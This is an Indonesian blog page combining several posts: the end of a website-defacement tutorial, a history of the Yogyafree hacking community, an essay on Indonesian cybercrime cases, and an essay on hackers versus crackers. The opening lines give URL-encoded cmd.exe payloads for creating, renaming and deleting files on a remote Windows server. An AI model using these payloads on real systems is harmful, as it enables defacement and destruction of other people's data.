Untuk membuat deface anda menjadi lebih bagus, dapat digunakan bahasa HTML dan ASCII
perintah-perintah lain :

membuat direktory = /c+mkdir+c:\
merubah nama file = /c+ren+c:\file
menghapus file = /c+del+c:\file
menghapus file Read-Only = /c+del+/R+c:\file
Read more

Profile detail Yogyafree

A. ABOUT YOGYAFREE
Yogyafree adalah Komunitas Komputer, internet, programming, dan hacking yang lahir pada pertengahan tahun 2004 yang dimana dimasa itu perekrutan members hanya melalui via e-mail.
Informasi umum Yogyafree
• Nama Komunitas : Yogyafree atau Yogya Family Code atau XCode (Sama)
• Jenis Komunitas : Komunitas Komputer, internet, programming, hacking dan security
• Lahir : 5 Juni 2004
• Website : http://www.xcode.or.id
• Forum : http://www.xcode.or.id/forum2 / http://forum.xcode.or.id
• Milis : http//groups.yahoo.com/group/yogyafree-perjuangan / http://milis.xcode.or.id
• Channel : #xcode DALnet IRC

Yogyafree Event :
• Demo Hacking Yogyafree I : November 2006
• Demo Hacking Yogyafree II : Januari 2007
• Demo Hacking Yogyafree III : Februari 2007
• Demo Hacking Yogyafree IV : Maret 2007
• Seminar Hacking Yogyafree 1 : Mei 2007
• JogjaHAC 2007 (Hacking Competition 2007) : Mei 2007
• Demo Hacking Yogyafree V : Mei 2007
• Demo Hacking Yogyafree VI : Juli 2007
• Seminar Yogyafree Web Hacking : November 2007
• Demo Hacking Yogyafree di Solo : Desember 2007
• Demo Hacking Yogyafree di Malang : Desember 2007
• Seminar Yogyafree : Materi Linux dan Jaringan : Desember 2007
• Seminar Yogyafree: Jaringan Wireless di Windows & Linux
• Seminar dan Demo Hacking Yogyafree di Solo : Desember 2007
• Demo Hacking Yogyafree di Jakarta : Januari 2008
• Seminar Yogyafree : Materi : Keamanan Jaringan Windows : Januari 2008
• Seminar dan Demo Hacking Yogyafree di Jakarta : Januari 2008
• Demo Yogyafree for free (Diliput TV Astro Awani) : Februari 2008
• Seminar Yogyafree : Materi : Pengenalan, instalasi dan Jaringan FreeBSD : Februari 2008
• Seminar Yogyafree : Materi : Friendster Security : Februari 2008
• Seminar dan Demo Hacking Yogyafree : Hacking Wireless dan Jaringan : Juli 2008
• Seminar dgn pembicara pak Onno di Sby yg di adakan dr YF regional Jatim / sby : Agustus 2008
• Demo Hacking Yogyafree VII : Agustus 2008
• JOGJAHAC 2008 (Jogjatronik Hacking Competition II, kerja sama Yogyafree dan JT MALL) : Agustus 2008
• Talk Show Yogyafree bersama founder JAVAHACKER : Agustus 2008
• Seminar dan demo hacking di UGM - Wireless & LAN Hacking beserta pengamanannya : September 2008
• Seminar dan demo hacking di Jogjatronik Mall - Wireless & LAN Hacking III beserta pengamanannya : September 2008

Regional Yogyafree :
• Yogyafree wilayah regional Jakarta
• Yogyafree wilayah regional Bandung
• Yogyafree wilayah regional Semarang
• Yogyafree wilayah regional Pontianak
• Yogyafree wilayah regional Surabaya
• Yogyafree Wilayah regional Malang
• Yogyafree Wilayah regional lampung
• Yogyafree Wilayah regional Bogor
• Yogyafree Wilayah regional Tegal
• Yogyafree Wilayah regional Palembang
• Yogyafree Wilayah regional Aceh
• Yogyafree Wilayah Regional Bali
• Yogyafree Wilayah Regional Makassar
• Yogyafree Wilayah Regional Jambi
• Yogyafree Wilayah Regional Banten
• Yogyafree Wilayah Regional Samarinda BPP
• Yogyafree Wilayah regional Papua
• Yogyafree Wilayah regional Medan
• Yogyafree Wilayah regional Probolinggo
• dst
Wilayah Regional diatas telah terdaftar resmi di database kami dan saat ini wilayah-wilayah regional Yogyafree di kota-kota yang terlicensi oleh kami telah banyak mengadakan berbagai demo dan gathering bersama.

Yogyafree di Blacklist :
• Hosting Yogyafree 2004 dibekukan oleh Bravehost.com tahun 2004
• 2 Hosting Yogyafree 2005 dibekukan oleh freewebs.com
• Hosting Yogyafree 2005-2006 dibekukan oleh atspace.com
• Forum Yogyafree di phpbbweb.com
• Dua buah Friendster Yogyafree di bekukan friendster.com pada tahun 2007
• Mlis Yogyafree di Yahoogroups dgn 12.000 lebih members di bekukan Yahoo.com thn 2008
• Channel #Yogyafree pernah beberapa kali dibekukan DALnet
• Beberapa warnet memblack list situs Yogyafree
• Hosting Yogyafree di bekukan Dreamhost tahun 2008

B. ABOUT CD YOGYAFREE
CD Yogyafree dirilis sebagai media fisik yogyafree untuk mebagikan content-content komputer, internet, programming dan hacking untuk masyarakat IT Indonesia.
CD Yogyafree Varian Pro (Standard CD Yogyafree tahun 2005 pertengahan hingga 2007 pertengahan) di produksi hanya sampai pertengahan tahun 2007 untuk CD Yogyafree Pro 9 – Hacker Edition kecuali Pro 10 ALIEN X.
• CD Yogyafree 1.
• CD Yogyafree Pro 2 / 2.1.x
• CD Yogyafree Pro 3
• CD Yogyafree Pro 4
• CD Yogyafree Pro 5
• CD Yogyafree Pro 6
• CD Yogyafree Pr o 7 / 7a /7b / 7c /7d /7c /7 Silver /7Gold /7 v100 /7 v101 (THUNDER)
• CD Yogyafree Pro 8
• CD Yogyafree Pro 9 – 1 disc (TITANIUM)
• CD Yogyafree Pro 9 – 2 disc (TITANIUM)
• CD Yogyafree Pro 9 – 1 disc (TITANIUM X)
• CD Yogyafree Pro 9 – Hacker Edition (CD Hacker Edition Generasi ke 2)
• CD Yogyafree Pro 10- ALIEN X

CD Yogyafree Enterprise (Software and source code only) – 2006 awal hingga 2006 ahkir sejak itu sudah tidak diproduksi lagi, Enterprise 5 merupakan CD versi yang tidak diminati. Versi 2.x adalah versi terlaris.
• CD Yogyafree Enterprise 1 / 1.x
• CD Yogyafree Enterprise 2 / 2.x varian
• CD Yogyafree Enterprise 3
• CD Yogyafree Enterprise 4
• CD Yogyafree Enterprise 5

CD Yogyafree Core (CD Yogyafree yang dirilis tahun 2006, CD Hacker Edition generasi ke 1)
• CD Yogyafree Core 1 / 1.x

DVD Yogyafree (DVD Yogyafree, era 2007 awal hingga 2007 pertengahan, DVD Yogyafree sudah tidak diproduksi lagi mulai ahkir Agustus 2008 karena beberapa alasan).
• DVD Yogyafree 1 / 1.x
• DVD Yogyafree 2 / 1.x

CD Yogyafree Express (CD Yogyafree yang codenamenya digunakan sampai saat ini mulai pertengahan tahun 2006 hingga saat ini tahun 2008 masih diproduksi untuk versi 11.x.
• CD Yogyafree Express v1.x
• CD Yogyafree Express v2.x
• CD Yogyafree Express v3.x
• CD Yogyafree Express v4.x
• CD Yogyafree Express v5.x
• CD Yogyafree Express v6.x
• CD Yogyafree Express v7.x
• CD Yogyafree Express v8.x
• CD Yogyafree Express v9.x
• CD Yogyafree Express v10.x
• CD Yogyafree Express v11.x

CD Yogyafree Raider (CD Yogyafree yang dirilis mulai Juli 2008, CD Hacker Edition generasi ke 2)
• CD Yogyafree Raider v1.0 July / v1.0 August / v1.0 X2
• CD Yogyafree Raider v2.0 Desember 2008
• CD Yogyafree Raider III Februari 2009

C. Sejarah Yogyafree
Yogyafree mempunyai sejarah yang sangat panjang, di mana semua itu di awali di bulan Juni 2004, kira-kira di jaman itu bug RPC DCOM masih sangat populer di Indonesia. Saat itu penamaannya masih 2 nama, Yogyafree dan Yogya Familiy Code, penamaan XCode baru lahir di tahun 2005, sehingga yogyafree mempunyai mempunyai 3 nama. Penulis membagi Yogyafree dari tahun 2004 hingga tahun 2008 menjadi 5 generasi.

• Generasi 1
Yogyafree atau dulu dikenal Yogya Family Code 2004 lahir tanggal 5 Juni 2004 dengan didirikannya web awal Yogyafree, saat itu content hacking masih sangat terbatas dan web sering berganti-ganti hosting karena dibekukan penyedia karena content hacking. perekrutan members dimulai di bulan itu melalui via e-mail, Generasi Yogyafree 2004 dirilis dari bulan Juni hingga 16 Desember 2004.

Di generasi awal web Yogya Family Code 2004 sudah merasakan pembekuan hosting pada waktu itu di bekukan oleh bravehost.com.

• Generasi 2 – Season 1
Yogya Family Code 2005 pertama kali di publish tanggal 16 Desember 2005, di bulan Desember 2004, #yogyafree DALnet lahir yang dimana di tahun mendatang #yogyafree mengalami banyak kejadian seperti perang, di frozen dalnet, di close dalnet, ancaman dalnet dst.

Di tahun 2005 Yogyafree 2005 semakin memperkuat posisinya di dunia maya dengan terus mengupdate web Yogya Family Code 2005 hingga 4 tingkat yaitu : Yogya Family Code Standard, Yogya Family Code Extreme, Yogya Family Code Final Evolution, Yogya Family Code Plus! Di awal tahun 2005, Yogyafree merilis Mailing list dan cukup ramai di saat pertama kali dipublish, Yogyafree kemudian merilis Forum Yogyafree perdana (Forum saat ini adalah forum generasi ke 2), Forum perdana ini cukup ramai members dan aktifitas, era perang cyber Indonesia dan Malaysia semakin menyemarakkan forum. Ini semua di buktikan Web Yogyafree di buka perharinya hingga 4000 kali lebih (berdasarkan counter fateback.com)

Beberapa bulan kemudian, forum Yogyafree di bekukan penyedianya sehingga membuat web Yogyafree pincang, pembekuan forum cukup memukul komunitas cukup telak sehingga selama beberapa bulan Yogyafree mengandalkan Channel dan Milis.

Pada tanggal 5 Juni 2005, ulang tahun Yogyafree ke 2, Yogyafree merilis CD Yogyafree 1, pembuatan CD Yogyafree perdana ini di distribusikan gratis oleh distributor pertama yaitu Mbak Wija, Operator Warnet di daerah selokan.

• Generasi 2 – Season 2
Ramai-ramainya Web Yogyafree era tahun 2005 dapat di lihat di sisa-sisa guestbook Yogyafree yang ada di CD Yogyafree dimana ribuan orang mengisi guestbook tersebut. Beberapa bulan setelah Forum di bekukan, Yogyafree ahkirnya membuat forum generasi ke 2 di phpbbweb.com, sambutan masyarakat IT terhadap forum ini sangat besar, terbukti di tahun 2005 members semakin terus menanjak dengan begitu cepat. CD Yogyafree versi ke 2 di rilis dan semakin menyemarakkan semua media Yogyafree.

Di ahkir tahun 2005, penamaan XCODE muncul atau disebut juga KALI CODE, dimana KALI CODE adalah nama sungai di kota Jogja. sehingga XCODE adalah nama lain dari Yogyafree.

Yogyafree di masa itu menjalin kerja sama dengan berbagai komunitas hacking dan programming di Indonesia sehingga Yogyafree semakin banyak dikenal.

• Generasi 3
Yogyafree generasi 1 telah melahirkan web YF 2004 dengan perekrutan members melalui via e-mail, Yogyafree generasi 2 melahirkan Web YF 2005, Channel YF, Milis YF, Forum YF, CD YF dan penamaan lain YF yaitu XCode.

Yogya Family Code 2006 atau Yogyafree 2006 adalah era awal Yogyafree semakin memperkuat diri di dunia maya maupun di dunia nyata. Yogyafree 2006 sebenarnya masih di bayang-bayang Yogyafree 2005 webnya karena dari sisi content Web Yogyafree 2006 lebih terbatas, tapi di era ini Media-media baru Yogyafree muncul, Friendster Yogyafree, XCode Magazine perdana dengan di awali artikel perdana oleh Adi (saat ini menjabat sebagai Founder Yogyafree II).

CD Yogyafree di rilis cukup banyak variannya versi Pro, versi Core dan Versi Enterprise. Di pertengahan tahun Forum Yogyafree dibekukan.

Banyak sekali cerita Yogyafree 2006, anda dapat membuka XCode Magazine No 3 untuk mengetahui cerita-cerita Web dan Forum Yogyafree karena jika ditulis disini akan sangat panjang seperti pembekuan Forum Yogyafree di phpBBweb.com yang ahkirnya bisa direstore / diselamatkan forumnya oleh JerryMaheswara.

Seiring perkembangan Web dan forum yang semakin pesat di tahun 2006, lagi-lagi pembekuan terjadi lagi, yang jadi sasaran saat itu adalah Web Yogyafree 2005 di bekukan atspace.com.

Di era Yogyafree generasi ke 3 itu gathering-gathering Yogyafree semakin sering di lakukan, donasi juga semakin banyak tidak hanya berupa uang tapi juga berupa peralatan komputer, Base Camp Yogyafree perdana di buka, Demo Hacking Yogyafree 2006 perdana di buat, distributor CD Yogyafree semakin di tambah, semua lini pada media Yogyafree benar-benar di maksimalkan.

Daftar Mantan Distributor CD Yogyafree 2005 – 2006 di Jogja : 2005 : Mbak Wijo (OP Warnet dekat Selokan) 2006 : Mbak Julehaa (OP Warnet di daerah dekat ringroad), Mbak Julie (OP warnet di daerah babarsari), Mbak Desy (OP Warnet di Wirobrajan), Hanachan (perseorangan)

• Generasi 4
Yogyafree 2007 merupakan perkembangan Yogyafree yang semakin pesat, Forum Yogyafree membersnya membludak luar biasa, milis juga membludak, terbukti Yogyafree merupakan komunitas hacking dengan members terbesar di Indonesia dan Mailing list merupakan mailing list hacking terpadat di Indonesia. Yogyafree semakin aktif di dunia nyata, Demo hacking sering diadakan, Seminar-seminar sering diadakan, gathering-gathering sering di adakan, lomba Hacking diadakan juga, DVD Yogyafree perdana diluncurkan, CD dan DVD Yogyafree di distribusikan gratis di Warnet KlikNet dan 2ndHome di masa itu.

Kunjungan-kunjungan Yogyafree regional di Yogyafree pusat sejak tahun 2006 telah dilakukan baik dari Solo, Semarang dan kota-kota besar lainnya di Indonesia.

Yogyafree ahkirnya membuka Yogyafree regional untuk semua members Yogyafree untuk membuat kepengurusan di daerahnya masing-masing untuk belajar bersama, berkreasi bersama dan sebagainya karena kami sadar sulitnya kami menjangkau kota-kota di luar Yogya untuk belajar dan sharing bersama di dunia nyata.

Berbagai Yogyafree Regional di Indonesia telah mengadakan berbagai kegiatan seperti gathering, seminar, lomba dan sebagai di regionalnya masing-masing.

Walaupun perkembangan Yogyafree semakin pesat namun ada juga sisi-sisi dimana Yogyafree juga mengalami jatuh bangun khususnya pada permasalahan hosting, 2 friendster Yogyafree dibekukan dan sebagainya.

• Generasi 5
Yogyafree 2008 merupakan era dimana Yogyafree berusaha lebih baik lagi dari pada era-era sebelumnya, Seminar dan demo hacking terus dikembangkan, Yogyafree membuka stand perdana di Mall, kegiatan Yogyafreepun di siarkan di TV Astro di bulan Februari 2008, Forum Yogyafree yang semakin membludak members dan sebagainya.

Yogyafree di era ini mengalami berbagai kejadian yang bervariasi seperti dari mailing list Yogyafree dengan members sebanyak 12.000 lebih di bekukan YahooGroups, web di deface, perang dengan Kaskus.us yang ahkirnya berdamai dan sebagainya.

Yogyafree tahun 2008 di pimpin founder II bernama Adi Nugroho karena penulis ingin lebih banyak bermain di belakang layar.

• Generasi 6
Yogyafree Generasi 6 ahkir membentuk Team Security Professional 2009 untuk regional Jogja, Medan masuk di regional Jogja.

Yogyafree adalah milik komunitas sejak Yogyafree berdiri, Yogyafree bukan milik perseorangan termasuk penulis sendiri, Yogyafree merupakan sebuah ruang belajar gratis yang berisi content-content gratis yang dimana semua members dan non members dapat saling sharing dan belajar bersama tanpa kecuali baik dari suku apapun, ras apapun, agama apapun, bangsa apapun dan sebagainya.

Kami sebagai para administrator, Moderator, OP, Koordinator dan penggiat berbagai kegiatan hanya fasilitator untuk mengatur agar semua media Yogyafree dan kegiatan Yogyafree dapat berjalan baik dan optimal untuk members dan semua masyarakat IT di Indonesia.
Read more

Ingin menjadi hacker yang baik

Ringkasan ini tidak tersedia. Harap klik di sini untuk melihat postingan. Read more

PERKEMBANGAN CYBERCRIME DI INDONESIA

Kebutuhan dan penggunaan akan teknologi informasi yang diaplikasikan dengan Internet dalam segala bidang seperti e-banking, ecommerce,e-government, e-education dan banyak lagi telah menjadi sesuatu yang lumrah. Bahkan apabila masyarakat terutama yang hidup di kota besar tidak bersentuhan dengan persoalan teknologi informasi dapat dipandang terbelakang atau ”GAPTEK”. Internet telah menciptakan dunia baru yang dinamakan cyberspace yaitu sebuah dunia komunikasi berbasis komputer yang menawarkan realitas yang baru berbentuk virtual (tidak langsung dan tidak nyata). Walaupun dilakukan secara virtual, kita dapat merasa seolah-olah ada di tempat tersebut dan melakukan hal-hal yang dilakukan secara nyata, misalnya bertransaksi, berdiskusi dan banyak lagi, seperti yang dikatakan oleh Gibson yang memunculkan istilah tersebut pertama kali dalam novelnya: “A Consensual hallucination experienced daily billions of legitimate operators, in every nation…A graphic representation of data abstracted from the banks of every computer in the human system. Unthinkable complexity. Lines of light ranged in the non-space of the mind, clusters and constellations of data. Like city lights, receeding”.

Perkembangan Internet yang semakin hari semakin meningkat baik teknologi dan penggunaannya, membawa banyak dampak baik positif maupun negatif. Tentunya untuk yang bersifat positif kita semua harus mensyukurinya karena banyak manfaat dan kemudahan yang didapat dari teknologi ini, misalnya kita dapat melakukan transaksi perbankan kapan saja dengan e-banking, e-commerce juga membuat kita mudah melakukan pembelian maupun penjualan suatu barang tanpa mengenal tempat. Mencari referensi atau informasi mengenai ilmu pengetahuan juga bukan hal yang sulit dengan adanya e-library dan banyak lagi kemudahan yang didapatkan dengan perkembangan Internet. Tentunya, tidak dapat dipungkiri bahwa teknologi Internet membawa dampak negatif yang tidak kalah banyak dengan manfaat yang ada. Internet membuat kejahatan yang semula bersifat konvensional seperti pengancaman, pencurian dan penipuan kini dapat dilakukan dengan menggunakan media komputer secara online dengan risiko tertangkap yang sangat kecil oleh individu maupun kelompok dengan akibat kerugian yang lebih besar baik untuk masyarakat maupun negara disamping menimbulkan kejahatan-kejahatan baru.

Banyaknya dampak negatif yang timbul dan berkembang, membuat suatu paradigma bahwa tidak ada komputer yang aman kecuali dipendam dalam tanah sedalam 100 meter dan tidak memiliki hubungan apapun juga. David Logic berpendapat tentang Internet yang diibaratkan kehidupan jaman cowboy tanpa kepastian hukum di Amerika, yaitu: ”The Internet is a new frontier. Just like the Wild, Wild West, the Internet frontier is wide open to both exploitation and exploration. There are no sheriffs on the Information Superhighway. No one is there to protect you or to lock-up virtual desperados and bandits. This lack of supervision and enforcement leaves users to watch out for themselves and for each other. A loose standard called "netiquette" has developed but it is still very different from the standards found in "real life". Unfortunately, cyberspace remains wide open to faceless, nameless con artists that can carry out all sorts of mischief “

Seperti seorang hacker dapat masuk ke dalam suatu sistem jaringan perbankan untuk mencuri informasi nasabah yang terdapat di dalam server mengenai data base rekening bank tersebut, karena dengan adanya e-banking jaringan tersebut dapat dikatakan terbuka serta dapat diakses oleh siapa saja. Kalaupun pencurian data yang dilakukan sering tidak dapat dibuktikan secara kasat mata karena tidak ada data yang hilang tetapi dapat diketahui telah diakses secara illegal dari sistem yang dijalankan. Tidak kurang menghebohkannya adalah beredarnya gambar-gambar porno hubungan seksual/pornografi, misalnya antara seorang bintang sinetron Sukma Ayu dan Bjah, penyanyi yang sedang naik daun. Gambar-gambar tersebut beredar secara luas di Internet baik melalui e-mail maupun dalam tampilan website yang dapat disaksikan oleh siapa saja secara bebas. Pengungkapan kejahatan ini masih sangat kecil sekali, dikarenakan banyak kendala dan hambatan yang dihadapi dalam upaya pengungkapannya. Saat ini, bagi mereka yang senang akan perjudian dapat juga melakukannya dari rumah atau kantor hanya dengan mengakses situs www.indobetonline.com atau www.tebaknomor.com dan banyak lagi situs sejenis yang menyediakan fasilitas tersebut dan memanfaatkan fasilitas Internet banking untuk pembayarannya. E-commerce tidak sedikit membuka peluang bagi terjadinya tindak pidana penipuan, seperti yang dilakukan oleh sekelompok pemuda di Medan yang memasang iklan di salah satu website terkenal “Yahoo” dengan seolah - olah menjual mobil mewah Ferrary dan Lamborghini dengan harga murah sehingga menarik minat seorang pembeli dari Kuwait. Perbuatan tersebut dapat dilakukan tanpa adanya hubungan terlebih dahulu antara penjual dan pembeli, padahal biasanya untuk kasus penipuan terdapat hubungan antara korban atau tersangka.

Dunia perbankan melalui Internet (ebanking) Indonesia, dikejutkan oleh ulah seseorang bernama Steven Haryanto, seorang hacker dan jurnalis pada majalah Master Web. Lelaki asal Bandung ini dengan sengaja membuat situs asli tapi palsu layanan Internet banking Bank Central Asia, (BCA). Steven membeli domain-domain dengan nama mirip www.klikbca.com (situs asli Internet banking BCA), yaitu domain wwwklik-bca.com, kilkbca.com, clikbca.com, klickca.com. dan klikbac.com. Isi situs-situs plesetan inipun nyaris sama, kecuali tidak adanya security untuk bertransaksi dan adanya formulir akses (login form) palsu. Jika nasabah BCA salah mengetik situs BCA asli maka nasabah tersebut masuk perangkap situs plesetan yang dibuat oleh Steven sehingga identitas pengguna (user id) dan nomor identitas personal (PIN) dapat di ketahuinya. Diperkirakan, 130 nasabah BCA tercuri datanya. Menurut pengakuan Steven pada situs bagi para webmaster di Indonesia, www.webmaster.or.id, tujuan membuat situs plesetan adalah agar publik menjadi lebih berhati – hati dan tidak ceroboh saat melakukan pengetikan alamat situs (typo site), bukan untuk mengeruk keuntungan.

Menurut perusahaan Security Clear Commerce di Texas USA, saat ini Indonesia menduduki peringkat ke 2 setelah Ukraina dalam hal kejahatan Carding dengan memanfaatkan teknologi informasi (Internet) yaitu menggunakan nomor kartu kredit orang lain untuk melakukan pemesanan barang secara online. Komunikasi awalnya dibangun melalui e-mail untuk menanyakan kondisi barang dan melakukan transaksi. Setelah terjadi kesepakatan, pelaku memberikan nomor kartu kreditnya dan penjual mengirimkan barangnya, cara ini relatif aman bagi pelaku karena penjual biasanya membutuhkan 3 –5 hari untuk melakukan kliring atau pencairan dana sehingga pada saat penjual mengetahui bahwa nomor kartu kredit tersebut bukan milik pelaku barang sudah terlanjur terkirim.

Selain carding, masih banyak lagi kejahatan yang memanfaatkan Internet. Tentunya masih hangat dalam pikiran kita saat seorang hacker bernama Dani Hermansyah, pada tanggal 17 April 2004 melakukan deface dengan mengubah nama - nama partai yang ada dengan nama- nama buah dalam website www.kpu.go.id, yang mengakibatkan berkurangnya kepercayaan masyarakat terhadap Pemilu yang sedang berlangsung pada saat itu. Dikhawatirkan, selain nama – nama partai yang diubah bukan tidak mungkin angka-angka jumlah pemilih yang masuk di sana menjadi tidak aman dan dapat diubah, padahal dana yang dikeluarkan untuk sistem teknologi informasi yang digunakan oleh KPU sangat besar sekali. Untung sekali bahwa apa yang dilakukan oleh Dani tersebut tidak dilakukan dengan motif politik, melainkan hanya sekedar menguji suatu sistem keamanan yang biasa dilakukan oleh kalangan underground (istilah bagi dunia Hacker). Terbukti setelah melakukan hal tersebut, Dani memberitahukan apa yang telah dilakukannya kepada hacker lain melalui chat room IRC khusus Hacker sehingga akhirnya tertangkap oleh penyidik dari Polda Metro Jaya yang telah melakukan monitoring di chat room tersebut. Deface disini berarti mengubah atau mengganti tampilan suatu website. Pada umumnya, deface menggunakan teknik Structured Query Language (SQL) Injection. Teknik ini dianggap sebagai teknik tantangan utama bagi seorang hacker untuk menembus jaringan karena setiap jaringan mempunyai sistem keamanan yang berbeda-beda serta menunjukkan sejauh mana kemampuan operator jaringan, sehingga apabila seorang hacker dapat masuk ke dalam jaringan tersebut dapat dikatakan kemampuan hacker lebih tinggi dari operator jaringan yang dimasuki.

Kelemahan admin dari suatu website juga terjadi pada penyerangan terhadap website www.golkar.or.id milik Partai Golkar. Serangan terjadi hingga 1577 kali melalui jalan yang sama tanpa adanya upaya menutup celah tersebut disamping kemampuan Hacker yang lebih tinggi, dalam hal ini teknik yang digunakan oleh Hacker adalah PHP Injection dan mengganti tampilan muka website dengan gambar wanita sexy serta gorilla putih sedang tersenyum.

Teknik lain adalah yang memanfaatkan celah sistem keamanan server alias hole Cross Server Scripting (XXS) yang ada pada suatu situs. XXS adalah kelemahan aplikasi di server yang memungkinkan user atau pengguna menyisipkan baris-baris perintah lainnya. Biasanya perintah yang disisipkan adalah Javascript sebagai jebakan, sehingga pembuat hole bisa mendapatkan informasi data pengunjung lain yang berinteraksi di situs tersebut. Makin terkenal sebuah website yang mereka deface, makin tinggi rasa kebanggaan yang didapat. Teknik ini pulalah yang menjadi andalan saat terjadi cyberwar antara hacker Indonesia dan hacker Malaysia, yakni perang di dunia maya yang identik dengan perusakan website pihak lawan. Menurut Deris Setiawan, terjadinya serangan ataupun penyusupan ke suatu jaringan komputer biasanya disebabkan karena administrator (orang yang mengurus jaringan) seringkali terlambat melakukan patching security (instalasi program perbaikan yang berkaitan dengan keamanan suatu sistem). Hal ini mungkin saja disebabkan karena banyaknya komputer atau server yang harus ditanganinya.

Dengan demikian maka terlihat bahwa kejahatan ini tidak mengenal batas wilayah (borderless) serta waktu kejadian karena korban dan pelaku sering berada di negara yang berbeda. Semua aksi itu dapat dilakukan hanya dari depan komputer yang memiliki akses Internet tanpa takut diketahui oleh orang lain/ saksi mata, sehingga kejahatan ini termasuk dalam Transnational Crime/ kejahatan antar negara yang pengungkapannya sering melibatkan penegak hukum lebih dari satu negara.
Mencermati hal tersebut dapatlah disepakati bahwa kejahatan IT/ Cybercrime memiliki karakter yang berbeda dengan tindak pidana umum baik dari segi pelaku, korban, modus operandi dan tempat kejadian perkara sehingga butuh penanganan dan pengaturan khusus di luar KUHP. Perkembangan teknologi informasi yang demikian pesatnya haruslah di antisipasi dengan hukum yang mengaturnya dimana kepolisian merupakan lembaga aparat penegak hukum yang memegang peranan penting didalam penegakan hukum, sebab tanpa adanya hukum yang mengatur dan lembaga yang menegakkan maka dapat menimbulkan kekacauan didalam perkembangannya. Dampak negatif tersebut menimbulkan suatu kejahatan yang dikenal dengan nama “CYBERCRIME” yang tentunya harus diantisipasi dan ditanggulangi. Dalam hal ini Polri sebagai aparat penegak hukum telah menyiapkan unit khusus untuk menangani kejahatan cyber ini yaitu UNIT V IT/CYBERCRIME Direktorat II Ekonomi Khusus Bareskrim Polri.
Read more

MENJADI HACKER ATAU CRACKER ?

Ketika saya membaca sebuah tulisan tentang hacker dan cracker, beberapa hari yang lalu, saya tersadarkan akan kesalahan penafsiran saya pada dua istilah tersebut dalam dunia cyberspace. Awalnya saya beranggapan bahwa hacker adalah cracker itu sendiri. Atau sama-sama mengusung sebuah "penamaan" untuk membobol mekanisme dan kinerja komputer orang lain. Hal itu pula lah yang kemudian menggiring kesadaran saya untuk mencoba berselancar di dalam internet selama berjam-jam, mengeprin beberapa naskah yang berkaitan dengan itu dan mencoba berkomunikasi dengan orang lain dalam arena chating.

Satu pertanyaan yang saya ajukan pada mereka adalah, apa itu hacker? Dan tragisnya, apa yang mereka jawab hampir sama dengan apa yang saya miliki, yakni seorang hacker adalah penyusup yang sengaja masuk pada jaringan komputer milik orang lain secara ilegal dan "mengacak-ngacak" dokumen didalamnya. Lalu apa itu cracker? Jawabannya pun nyaris sama. Intinya, baik hacker maupun cracker adalah para penyusup yang harus di waspadai keberadaanya. Kalau kedua istilah itu punya arti yang sama, maka pasti ada yang salah dengan pendefinisian keduanya.

Lalu, dimana letak kesalahan dari pendefinisian kedua istilah yang kerap hinggap ditelinga kita ini? Apalagi semenjak ada kabar bahwa "KPU-online" dibobol oleh para "hacker" beberapa bulan kebelakang. Benarkah itu adalah pekerjaan seorang hacker? Atau pekerjaan seorang cracker?

Tulisan ini mencoba menjawab dua istilah yang tidak asing ditelinga kita tersebut dengan wacana seorang pembelajar murni. Artinya, saya bukan dari kedua golongan tadi. Walaupun pada akhirnya menjadi tertarik untuk sekedar tahu aktifitas mereka (para hacker & cracker) sebagai satu ilmu yang menarik dalam dunia IT beberapa tahun ini.

PERSOALAN DASAR

Hacker dalam tulisan Eric Steven Raymond adalah " there is a community, a shared culture, of expert programmers and networking wizards that its history back trough decades to the firs time-sharing minicomputers and the earliesr ARPAnet experiment"

Dengan kata lain, Raymon mengatakan, "the members of this culture originated the term 'hacker'". Para hackerlah yang kemudian memperkenalkan internet, membuat program sistem operasi UNIX hingga bisa digunakan saat ini. Dan para hacker pula lah yang telah berjasa dalam menjalankan World Wide Web sehingga dapat dinikmati oleh semua orang di seluruh dunia di belahan manapun dia berada asal terkoneksi pada internet.

Lebih lanjut Raymon mengatakan " jika anda berada pada komunitas ini dan jika anda memiliki konstribusi didalamnya, dan kemudian orang mengenal anda sebagai hacker, maka anda adalah seorang hacker".

Sekilas dari pandangan Raymon kita dapat satu definisi bahwa seorang hacker bukanlah orang yang jahat seperti yang kita pikirkan selama ini. Ya, jika mereka memang bisa masuk kedalam komputer kita (malalui jaringan internet) karena mereka bisa menguasai ilmunya. Namun jika ada orang yang kemudian masuk secara ilegal kedalam komputer kita dan kemudian "mencuri dan mengacak-ngacak" data kita, mereka adalah CRACKER. Dan bisa jadi mereka adalah seorang hacker dalam dunia yang berbeda. Dengan kata lin, mereka semua adalah para ahli dalam hal teknologi informasi ini dan berkecimpung serius didalamnya.

Namun untuk menghindari kerancuan, maka sebuah kata kunci dalam masalah ini, menurut Raymon adalah perbedaan antara keduanya; seorang Hacker adalah dia yang membangun sistem, sementara seorang Cracker malah "menghancurkannya". (How to become a hacker, Eric S. Raymond, 2001).

Kapan istilah hacker menjadi trend sebagai sebuah kejahatan yang menakutkan? Tidak lain karena "dosa" pakar film di hollywood yang membiaskan istilah hacker dan cracker ini. Banyak film yang mengangkat tema hacker dalam sebuah bentuk "penghancuran sistem informasi " yang seharusnya makna itu diterapkan pada seorang cracker.

Sebut misalnya film the Net (1995), Take Down(1999). Film tersebut mengangkat tema hacker untuk menyebut cracker.

Dan dari kesalah penafsiran tadi, hingga kini pun istilah hacker masih dibiaskan dengan istilah cracker. Kerancuan itu tidak hanya terjadi di Indonesia saja, bahkan di luar negeripun pandangan terhadap keduanya sama seperti itu.

Terminologi hacker muncul pada awal tahun 1960-an diantara anggota organisasi mahasiswa Tech Model Railroad club di Lab Kecerdasan Artifisial Masschusetts Institute Of Teknology (MIT). Istilah hacker awalnya bermakna positif untukmenyebut seorang anggota yang memiliki keahlian dalam bidang komputer dan mampu membuat progranm komputer dengan lebih baik ketimbang yang ada sebelumnya (Memahmi karakteristik Komunitas Hacker: Studi Kasus pada Komunitas Hacker Indonesia, Donny B.U, M.Si)

MENJADI HACKER

Mungkin sekilas tentang definisi di atas cukup untuk membatasi sejauhmana peranan seorang hacker dan cracker itu. Tulisan ini tidak akan mengangkat sejarah hacker dan awal mula kerancuannya. Namun lebih menitik beratkan pada bagaimana seandainya kita belajar menjadi hacker. Atau lebih spesifik, bisakah kita menjadi seorang hacker?

